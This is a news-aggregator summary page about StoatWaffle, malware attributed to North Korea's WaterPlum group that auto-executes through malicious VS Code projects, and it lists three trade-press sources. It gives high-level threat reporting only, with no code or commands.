EarlyNarratives
Pricing
Start free trialSign in
Start free trialSign in
Signal

New StoatWaffle malware targets developers via malicious VS Code projects

Evidence first: scan the strongest sources, then decide whether to go deeper.

Published 2026-03-24 10:49 UTCUpdated 2026-03-24 17:30 UTC
rss
malwarethreat_actorssecurity_toolingincident_response
Source links open
Source links and full evidence are open here. Archive history, compare-over-time, alerts, exports, API, integrations, and workflow are paid.
BackEvidence (3)Get the free brief by emailStart free trial
No card needed for the free brief.
Evidence trail (top sources)
top sources (3 domains)domains are deduped. counts indicate coverage, not truth.
3 top sources shown
View all evidence
Overview

A new malware strain called StoatWaffle, linked to the North Korean threat actor WaterPlum and the Contagious Interview campaign, has evolved to auto-execute attacks embedded in Visual Studio Code projects.

Entities
StoatWaffleContagious InterviewWaterPlum
Score total
1.16
Momentum 24h
3
Posts
3
Origins
3
Source types
1
Duplicate ratio
0%
Why now
  • StoatWaffle has been actively deployed since December, signaling ongoing threat activity.
  • Recent disclosures highlight a shift to more seamless, frictionless malware execution in developer tools.
  • Concurrent GitHub malware campaigns using split payloads increase risks to developers and related users.
Why it matters
  • StoatWaffle lowers the barrier for developer environment compromise by auto-executing malicious code on folder open.
  • Developers’ trusted tools and workflows are increasingly targeted, expanding the attack surface beyond traditional malware delivery methods.
  • Detection efforts must adapt to weaponized development environments, not just malicious packages or phishing lures.
LLM analysis
Topic mix: lowPromo risk: lowSource quality: medium
Recurring claims
  • StoatWaffle malware auto-executes attacks embedded in Visual Studio Code projects when folders are opened and trusted by developers.
  • WaterPlum, a North Korean threat actor, has deployed StoatWaffle since December using blockchain-themed VS Code project repositories as decoys.
  • A separate large-scale GitHub-hosted malware campaign uses split payloads to evade detection, targeting developers and gamers with trojanized repositories.
How sources frame it
  • CSO Online: neutral
  • SC Media: neutral
  • Help Net Security: neutral
This emerging malware campaign highlights the growing risk of weaponized developer environments and the need for enhanced detection strategies focused on trusted tools like VS Code.
All evidence
All evidence
Illicit VS Code projects tapped to deploy StoatWaffle malware
SC Media · scworld.com · 2026-03-24 17:30 UTC
New ‘StoatWaffle’ malware auto‑executes attacks on developers
CSO Online · csoonline.com · 2026-03-24 11:58 UTC
GitHub-hosted malware campaign uses split payload to evade detection
Help Net Security · helpnetsecurity.com · 2026-03-24 10:49 UTC
Show filters & breakdown
Posts loaded: 0Publishers: 3Origin domains: 3Duplicates: -
Showing 3 / 0
Top publishers (this list)
  • SC Media (1)
  • CSO Online (1)
  • Help Net Security (1)
Top origin domains (this list)
  • scworld.com (1)
  • csoonline.com (1)
  • helpnetsecurity.com (1)